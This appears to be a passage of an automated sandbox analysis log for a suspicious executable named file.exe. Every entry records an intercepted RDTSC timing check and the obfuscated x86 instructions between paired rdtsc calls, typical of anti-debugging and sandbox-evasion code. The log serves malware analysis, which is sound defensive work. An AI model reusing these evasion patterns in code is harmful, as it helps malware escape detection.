Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1333E14 second address: 1333E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jl 00007F400D373726h 0x0000000f jmp 00007F400D373720h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13341A8 second address: 13341E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F400D181C08h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 xchg eax, ebx 0x00000024 push ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F400D181C0Fh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13341E4 second address: 13341F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jc 00007F400D373724h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133466D second address: 13346B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 jnl 00007F400D181C15h 0x0000000e pop ebx 0x0000000f nop 0x00000010 and edi, dword ptr [ebp+122D3786h] 0x00000016 push 00000000h 0x00000018 movsx edi, bx 0x0000001b push 00000000h 0x0000001d clc 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F400D181C14h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13346B1 second address: 13346B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1337789 second address: 133778F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1335891 second address: 13358A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D37371Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133778F second address: 1337801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F400D181C0Ch 0x00000013 jo 00007F400D181C06h 0x00000019 pop edx 0x0000001a nop 0x0000001b mov esi, ecx 0x0000001d mov esi, 496E6900h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F400D181C08h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D2810h], eax 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 ja 00007F400D181C19h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13358A4 second address: 13358A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133956B second address: 133956F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133A112 second address: 133A116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 133A116 second address: 133A11A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1340657 second address: 1340669 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1345B05 second address: 1345B0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1345B0B second address: 1345B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1345B0F second address: 1345B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13479F4 second address: 1347A1C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or bl, 00000030h 0x0000000a push 00000000h 0x0000000c sub ebx, dword ptr [ebp+122D25FFh] 0x00000012 push 00000000h 0x00000014 movsx ebx, ax 0x00000017 push eax 0x00000018 pushad 0x00000019 jno 00007F400D37371Ch 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1347A1C second address: 1347A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1345D1F second address: 1345D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1346C43 second address: 1346C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D181C0Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1345D23 second address: 1345D3D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jng 00007F400D373724h 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F400D373716h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1346C56 second address: 1346C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1348AC8 second address: 1348ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1346C5A second address: 1346C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F1C90 second address: 12F1C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1348ACD second address: 1348ADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400D181C0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1346C5E second address: 1346C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F1C94 second address: 12F1C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1348ADE second address: 1348AEF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1346C6B second address: 1346C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F1C98 second address: 12F1CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F400D373716h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1346C70 second address: 1346C7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F400D181C06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F1CA7 second address: 12F1CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F400D37371Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1348BA3 second address: 1348BAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F400D181C06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12F1CB7 second address: 12F1CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134AF3E second address: 134AF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134AF4A second address: 134AF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134AF4E second address: 134AF52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134AF52 second address: 134AF9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F400D373716h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 popad 0x00000011 nop 0x00000012 adc ebx, 0ED84800h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F400D373718h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 and edi, dword ptr [ebp+122D295Ch] 0x0000003a push 00000000h 0x0000003c xchg eax, esi 0x0000003d jnp 00007F400D373728h 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134AF9B second address: 134AF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134AF9F second address: 134AFA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134BF22 second address: 134BF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F400D181C0Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134BF37 second address: 134BF3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134BF3D second address: 134BFA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F400D181C08h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 clc 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F400D181C08h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 jne 00007F400D181C10h 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d js 00007F400D181C06h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134BFA2 second address: 134BFA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134CF14 second address: 134CF88 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F400D181C08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F400D181C08h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 jmp 00007F400D181C12h 0x0000002a push 00000000h 0x0000002c movsx edi, bx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F400D181C08h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c jl 00007F400D181C0Eh 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134CF88 second address: 134CF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134E074 second address: 134E091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F400D181C06h 0x0000000a popad 0x0000000b jns 00007F400D181C0Ch 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134E091 second address: 134E099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 134E099 second address: 134E09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13513AC second address: 13513B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13513B1 second address: 1351458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F400D181C08h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2A38h] 0x0000002a or dword ptr [ebp+12466D63h], edi 0x00000030 push dword ptr fs:[00000000h] 0x00000037 add bx, 1300h 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 jmp 00007F400D181C12h 0x00000048 mov eax, dword ptr [ebp+122D10D1h] 0x0000004e jmp 00007F400D181C10h 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007F400D181C08h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000016h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov bh, FAh 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jnp 00007F400D181C0Ch 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1351458 second address: 135146D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400D373721h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1350286 second address: 135028C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 135028C second address: 135030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F400D373718h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 push dword ptr fs:[00000000h] 0x00000028 cmc 0x00000029 jmp 00007F400D37371Bh 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F400D373718h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f push edi 0x00000050 pop edi 0x00000051 mov eax, dword ptr [ebp+122D0A65h] 0x00000057 mov ebx, dword ptr [ebp+122D2874h] 0x0000005d push FFFFFFFFh 0x0000005f mov edi, dword ptr [ebp+122D197Ch] 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 push esi 0x0000006a pop esi 0x0000006b push ebx 0x0000006c pop ebx 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 135030F second address: 1350336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F400D181C08h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1352351 second address: 1352355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1352355 second address: 135235E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1359A7B second address: 1359A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1359A7F second address: 1359A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1359A8A second address: 1359A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1359ED0 second address: 1359ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1359ED6 second address: 1359EE6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F400D373716h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1359EE6 second address: 1359F01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D181C17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13604D3 second address: 13604F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnc 00007F400D373716h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F400D37371Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13604F1 second address: 136051B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F400D181C19h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jl 00007F400D181C0Eh 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136051B second address: 1360538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F400D373724h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1360538 second address: 136053E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1360614 second address: 136065F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400D373729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push esi 0x0000000c jmp 00007F400D373727h 0x00000011 pop esi 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jo 00007F400D373728h 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007F400D373716h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136065F second address: 136068F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F400D181C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push edi 0x0000000d pushad 0x0000000e jmp 00007F400D181C10h 0x00000013 je 00007F400D181C06h 0x00000019 popad 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 pop ebx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136068F second address: 1360699 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F400D373716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1360699 second address: 136069E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136069E second address: 13606A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1365770 second address: 136578B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400D181C0Ch 0x00000009 popad 0x0000000a pop edi 0x0000000b pushad 0x0000000c jbe 00007F400D181C0Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 136578B second address: 13657B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F400D373722h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F400D373721h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1364C89 second address: 1364C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1364C8F second address: 1364C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13651CF second address: 13651DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F400D181C06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13651DB second address: 13651EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F400D37371Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13651EC second address: 13651F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13651F1 second address: 13651F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
